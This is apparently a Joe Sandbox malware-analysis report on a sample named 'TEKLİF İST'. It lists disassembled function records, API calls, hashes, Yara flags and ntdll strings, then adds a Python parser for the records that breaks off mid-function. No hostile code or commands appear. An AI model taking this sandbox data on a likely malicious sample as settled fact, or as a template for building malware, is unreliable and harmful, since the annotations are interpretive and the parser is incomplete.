                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7b0a229f86679f0c73f5b0e81e19962713b23065e3ee09568684ba0b7b6c69a3
                                                                                                              • Instruction ID: a86cae5fbe2678cc0607f02921c73359d01697b6216d0ccee2bdcde4cea323ba
                                                                                                              • Opcode Fuzzy Hash: 7b0a229f86679f0c73f5b0e81e19962713b23065e3ee09568684ba0b7b6c69a3
                                                                                                              • Instruction Fuzzy Hash: FD900222242445525A49B15844045074006A7E1241795C062A1418951CC62A9957D725
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: a589971c855775d53e7cec8a369efebe75869100b4bbf60ac71e3af15bdf0432
                                                                                                              • Instruction ID: 436f3f53acc8af40966717556495d5940661ea06770e98037e9739f7d1cb14dc
                                                                                                              • Opcode Fuzzy Hash: a589971c855775d53e7cec8a369efebe75869100b4bbf60ac71e3af15bdf0432
                                                                                                              • Instruction Fuzzy Hash: 5D90022230140403D644715854186064005E7E2301F55D061E0418555CDA1989575326
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1235532dc86de27c5dd0530b6a31bd116d7307de2b772eb03283dd3d80773d3f
                                                                                                              • Instruction ID: 5fd58dd63d6f501504cf551154da378f24700f36797061e8d0b7a8f842be9a1e
                                                                                                              • Opcode Fuzzy Hash: 1235532dc86de27c5dd0530b6a31bd116d7307de2b772eb03283dd3d80773d3f
                                                                                                              • Instruction Fuzzy Hash: 8190022A21340402D6847158540860A000597D2202F95D465A0019559CCA19896A5325
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 368baae1d89094c030467479926c32257008fa6c2eab471abb79620b226bf48d
                                                                                                              • Instruction ID: c0c9d185403fbab38c0ed2e2aca018117cf7f3e3a61a52d39536e597c23b990b
                                                                                                              • Opcode Fuzzy Hash: 368baae1d89094c030467479926c32257008fa6c2eab471abb79620b226bf48d
                                                                                                              • Instruction Fuzzy Hash: F790023220140802D60475985408646000597E1301F55D061A5028556EC76989926235
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8bbae2818a6db2a47d3f3dc3455605ac03b8c287d64dcd557c82a83fdc8ba4b7
                                                                                                              • Instruction ID: a3c8bd44f74c097b263600d75f4be387c0d4e4a267ba4726ee6c41f5474f6633
                                                                                                              • Opcode Fuzzy Hash: 8bbae2818a6db2a47d3f3dc3455605ac03b8c287d64dcd557c82a83fdc8ba4b7
                                                                                                              • Instruction Fuzzy Hash: 2E90023220148C02D6147158840474A000597D1301F59C461A4428659DC79989927225
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8f2a4256e5523cd80b0d0311013a3c14fcf4a37f60b42f5cdce55f3f1edab6e5
                                                                                                              • Instruction ID: 8e3752339f109f69fe1752cc2e59316976b9a6e673cf433d5a722d78acd4d9be
                                                                                                              • Opcode Fuzzy Hash: 8f2a4256e5523cd80b0d0311013a3c14fcf4a37f60b42f5cdce55f3f1edab6e5
                                                                                                              • Instruction Fuzzy Hash: 63900222601404424644716888449064005BBE2211755C171A099C551DC65D89665769
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: db0939e1c929076955ff3142cf23b5ce1cb94824369a9ac238f49469f04c7176
                                                                                                              • Instruction ID: b16bb0e262e2a9962b483ebb280a93c7481d7a947f450d4de3ce7601ed0455bc
                                                                                                              • Opcode Fuzzy Hash: db0939e1c929076955ff3142cf23b5ce1cb94824369a9ac238f49469f04c7176
                                                                                                              • Instruction Fuzzy Hash: 5C90023220180802D6047158481470B000597D1302F55C061A1168556DC72989526675
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 368a8f3380f9ba384ee73fe0348fd9fdf525f14a1fffed9092d64eb481791913
                                                                                                              • Instruction ID: da8977ec875e08c6db9482a3c64a83858759981341c5f69dad75e3fa19887f20
                                                                                                              • Opcode Fuzzy Hash: 368a8f3380f9ba384ee73fe0348fd9fdf525f14a1fffed9092d64eb481791913
                                                                                                              • Instruction Fuzzy Hash: BF900222211C0442D70475684C14B07000597D1303F55C165A0158555CCA1989625625
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9880d80260f24472ea3602def426391014f8fe10f07b00a03dbe4308fa009a0f
                                                                                                              • Instruction ID: 539c19ad9e35f596ef4114aa8862ce765092b7eb41259af0524cce5c85aeedf4
                                                                                                              • Opcode Fuzzy Hash: 9880d80260f24472ea3602def426391014f8fe10f07b00a03dbe4308fa009a0f
                                                                                                              • Instruction Fuzzy Hash: F990026234140842D60471584414B060005D7E2301F55C065E1068555DC71DCD53622A
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d49176e7851880baab6137736cf23a114d97d983ad445374812ee062c246f4d0
                                                                                                              • Instruction ID: 1fad8134b818dc0237564c650648e296c4963c83d79114cc50bcc2fadda6f518
                                                                                                              • Opcode Fuzzy Hash: d49176e7851880baab6137736cf23a114d97d983ad445374812ee062c246f4d0
                                                                                                              • Instruction Fuzzy Hash: 4590027220140802D64471584404746000597D1301F55C061A5068555EC75D8ED66769
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 95b5584350a04124bc787da9115de6ef32ddde70ac7372276977a09d3e904b29
                                                                                                              • Instruction ID: ab8d2c2b8890bcb4b880f311272a8bf711e76ea59e56d0d6a27e6899a97239ca
                                                                                                              • Opcode Fuzzy Hash: 95b5584350a04124bc787da9115de6ef32ddde70ac7372276977a09d3e904b29
                                                                                                              • Instruction Fuzzy Hash: 3190022260140902D60571584404616000A97D1241F95C072A1028556ECB298A93A235
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                              • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                                                                                              • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                              • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
Control-flow Graph
                                                                                                              control_flow_graph 11 41a632-41a639 12 41a6a3-41a6a8 ExitProcess 11->12 13 41a63b 11->13 14 41a5f6-41a5fd 13->14 15 41a63d 13->15 16 41a61b-41a631 RtlAllocateHeap 15->16 17 41a63f 15->17 17->12
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateExitHeapProcess
                                                                                                              • String ID: 6EA
                                                                                                              • API String ID: 1054155344-1400015478
                                                                                                              • Opcode ID: 47508782786a64f1a4d8e9ee814f552b76b8f1e01370df25776678557343657f
                                                                                                              • Instruction ID: f3a8626008191923e07bac595a229e4eb5614c867216e2dd50514f9d6a1fbb57
                                                                                                              • Opcode Fuzzy Hash: 47508782786a64f1a4d8e9ee814f552b76b8f1e01370df25776678557343657f
                                                                                                              • Instruction Fuzzy Hash: 6CE0C27510B1983AEB18A7B03E858F77F1DC8C121472C4AEAFACC9E407C429916283A6
Control-flow Graph
                                                                                                              control_flow_graph 19 41a600-41a631 call 41af30 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID: 6EA
                                                                                                              • API String ID: 1279760036-1400015478
                                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                              • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                              • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0

Control-flow Graph
control_flow_graph 217 41a5c6-41a5cc 218 41a59d-41a5a7 call 41af30 217->218 219 41a5ce 217->219 224 41a5ac-41a5c1 call 1b82c70 218->224 221 41a5d0-41a5fd call 41af30 219->221 222 41a64b-41a657 call 41af30 219->222 226 41a65c-41a671 RtlFreeHeap 222->226 228 41a5c3-41a5c5 224->228
Block 224 calls 1b82c70, an address inside the 01B10000 region whose dump (further down) carries ntdll strings; the RtlFreeHeap call site 0041A66D in block 226 is the same one listed for the function at 41a640 below.
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 151e719e1fe50e17b4ef87342ef9202b6ccf1721b88ce42bd16b803d403f5492
• Instruction ID: 710bbcc343550d2e60226a4eb97f5427688d4fc6556b828fe111e3aabe4103ba
• Opcode Fuzzy Hash: 151e719e1fe50e17b4ef87342ef9202b6ccf1721b88ce42bd16b803d403f5492
• Instruction Fuzzy Hash: 6E11C2B92053046FDB14EFA8DC81CEB77A8EF84318B40854AFC5947302D234E962CBB5

Control-flow Graph
control_flow_graph 231 408310-40833d call 41be30 call 41c9d0 236 408343-40835a call 414e50 231->236 237 40833e call 40acf0 231->237 240 40835c-40836e PostThreadMessageW 236->240 241 40838e-408392 236->241 237->236 242 408370-40838a call 40a480 240->242 243 40838d 240->243 242->243 243->241
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A (message 0x111 = WM_COMMAND, wParam = lParam = 0, posted to a thread queue rather than a window)
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
• Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
• Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
• Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Control-flow Graph
control_flow_graph 246 4082d3-4082df 247 4082e1-4082fd call 41b870 call 41b720 246->247 248 408337-40835a call 40acf0 call 414e50 246->248 257 40835c-40836e PostThreadMessageW 248->257 258 40838e-408392 248->258 259 408370-40838a call 40a480 257->259 260 40838d 257->260 259->260 260->258
This graph overlaps the function at 408310 above: block 248 (408337-40835a) spans its first two blocks, and the tail blocks 40835c-408392, including the PostThreadMessageW call at 0040836A, are shared, so the two records are two entry points into the same code.
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A (message 0x111 = WM_COMMAND)
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 7c12312fb9c11a5d82f084d113b032006b16db5ca1e92a579f808e6171a4af43
• Instruction ID: 967da45d43d500b0c3c5d9e15febe837a69d4a3a08b03dd864461a48f287fc59
• Opcode Fuzzy Hash: 7c12312fb9c11a5d82f084d113b032006b16db5ca1e92a579f808e6171a4af43
• Instruction Fuzzy Hash: F1017D32A4032932E62166653D43FFA730C9B41F64F04017FFE04FB2C1EAA9A91142EA

Control-flow Graph
control_flow_graph 287 41a640-41a656 288 41a65c-41a671 RtlFreeHeap 287->288 289 41a657 call 41af30 287->289 289->288
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
• Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0

Control-flow Graph
control_flow_graph 290 41a7a0-41a7d4 call 41af30 LookupPrivilegeValueW
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
• Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
• Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
APIs: none resolved for this function
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e0aeff5d916e3c5535c17e4adb8359cd7f8d8a0501629f250e4fe94da85f6f2e
• Instruction ID: f0e56b67e83ce8e650163256e8ddc64d757f3750273f2464dcef1581d0ef8abd
• Opcode Fuzzy Hash: e0aeff5d916e3c5535c17e4adb8359cd7f8d8a0501629f250e4fe94da85f6f2e
• Instruction Fuzzy Hash: 3EB09B729015C5C5DF15F76446087177900B7D1701F15C0F1D2034646F473CC1D1E675
Strings: none listed with xrefs; the String ID below carries ntdll's own names (LdrpInitializeExecutionOptions, the Image File Execution Options value names such as GlobalFlag and MaxLoaderThreads, and the source path minkernel\ntdll\ldrinit.c), so this 01B10000 dump holds ntdll loader code rather than code of the sample itself.
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: 64f88f7b2769d3843133dccfd877854775f05027b830719d78c1829b4e5a4e45
• Instruction ID: 65be6691ca980a4b9bcc2f5b620a3549f770b7fddc4609f46236310d093b95c2
• Opcode Fuzzy Hash: 64f88f7b2769d3843133dccfd877854775f05027b830719d78c1829b4e5a4e45
• Instruction Fuzzy Hash: AB928F71604342AFEB29DF19C880B6BB7E8FB94B50F0449ADFA95D7260D770E844CB52
Strings
• Thread identifier, xrefs: 01BB553A
• double initialized or corrupted critical section, xrefs: 01BB5508
• Address of the debug info found in the active list., xrefs: 01BB54AE, 01BB54FA
• Invalid debug info address of this critical section, xrefs: 01BB54B6
• undeleted critical section in freed memory, xrefs: 01BB542B
• Critical section address., xrefs: 01BB5502
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01BB540A, 01BB5496, 01BB5519
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01BB54CE
• Critical section address, xrefs: 01BB5425, 01BB54BC, 01BB5534
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01BB54E2
• 8, xrefs: 01BB52E3
• Thread is in a state in which it cannot own a critical section, xrefs: 01BB5543
• Critical section debug info address, xrefs: 01BB541F, 01BB552E
• corrupted critical section, xrefs: 01BB54C2
These are ntdll's critical-section consistency-check messages (the text shown when such a check fails under a debugger), again locating this function in ntdll code within the 01B10000 region.
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: bec2510854721df56d2049d52a063a292e331586f8dc288d9af9359c858dfc0c
• Instruction ID: 1e0260e75404b496276644a62277b153986b76d6ea11cff319851d367efcb9a3
• Opcode Fuzzy Hash: bec2510854721df56d2049d52a063a292e331586f8dc288d9af9359c858dfc0c
• Instruction Fuzzy Hash: 6081ACB0A01358AFEB28CF99C885BEEBBF5FB48B10F104199F509B7650D3B5A944CB51
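The records above are Joe Sandbox's per-function listing as rendered on this page: a compact control_flow_graph line (block id, address range, "call" targets and resolved API names for that block, then A->B edges), the APIs and Strings bullets with their call sites and xrefs, the memory-dump source line, and the Similarity fields ending in the Instruction Fuzzy Hash. The following is an added example, not part of this report or of Joe Sandbox: a Python parser for that rendered layout that turns the records into structured rows, names the window message a PostThreadMessageW call posts, and builds an API-to-call-site inventory. The SAMPLE text is constructed from records on this page; the assumed order of the dump file name fields (process index, phase, timestamp, base address) and the small winuser.h message table are this example's own assumptions.

```python
"""Parse the per-function records of a Joe Sandbox report as rendered on this page
(compact control_flow_graph line, APIs / Strings bullets, Similarity fields). Added
example: one reading of the rendered layout, not a Joe Sandbox API; SAMPLE is constructed."""
import re

SAMPLE = """\
control_flow_graph 287 41a640-41a656 288 41a65c-41a671 RtlFreeHeap 287->288 289 41a657 call 41af30 287->289 289->288
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FreeHeap
• Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePostThread
• Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
Strings
• Critical section address, xrefs: 01BB5425, 01BB54BC, 01BB5534
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Similarity
• API ID:
• Instruction Fuzzy Hash: 6081ACB0A01358AFEB28CF99C885BEEBBF5FB48B10F104199F509B7650D3B5A944CB51
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
EDGE_RE = re.compile(r"^\d+->\d+$")
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Similarity")
# winuser.h values for the second PostThreadMessageW argument (the message number)
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT", 0x0111: "WM_COMMAND", 0x0400: "WM_USER"}


def parse_cfg(line):
    """Decode 'control_flow_graph ID RANGE [call X]* [Api]* ... A->B ...' into nodes and edges."""
    nodes, edges, cur, expect_addr = {}, [], None, False
    tokens, i = line.split()[1:], 0
    while i < len(tokens):
        tok = tokens[i]
        if expect_addr:                 # the token after a block id is its address (range)
            nodes[cur]["range"], expect_addr = tok, False
        elif EDGE_RE.match(tok):        # 'A->B' edge between block ids
            edges.append(tuple(int(x) for x in tok.split("->")))
        elif tok == "call":             # 'call <target>' belongs to the current block
            nodes[cur]["calls"].append(tokens[i + 1])
            i += 1
        elif tok.isdigit():             # a new basic-block id
            cur, expect_addr = int(tok), True
            nodes[cur] = {"range": None, "calls": [], "apis": []}
        else:                           # bare name: resolved API called from this block
            nodes[cur]["apis"].append(tok)
        i += 1
    return {"nodes": nodes, "edges": edges}


def new_record(): return {"apis": [], "strings": [], "fields": {}, "source": {}, "cfg": {}}


def parse_records(text):
    """One record per block; 'Instruction Fuzzy Hash' is the last field and closes it."""
    records, rec, section = [], new_record(), None
    for line in text.splitlines():
        if line.startswith("control_flow_graph "):
            rec["cfg"] = parse_cfg(line)
        elif line in SECTIONS:
            section = line
        elif m := SRC_RE.match(line):
            parts = m.group(1).split(".")   # assumed dump-name order: process, phase, timestamp, base, ...
            rec["source"] = {"file": m.group(1), "process": int(parts[0]), "base": int(parts[3], 16),
                             "offset": int(m.group(2), 16), "pe": m.group(3) == "true"}
        elif section == "APIs" and (m := API_RE.match(line)):
            rec["apis"].append({"name": m.group(1), "module": m.group(2),
                                "args": m.group(3).split(","), "ref": m.group(4)})
        elif section == "Strings" and ", xrefs: " in line:
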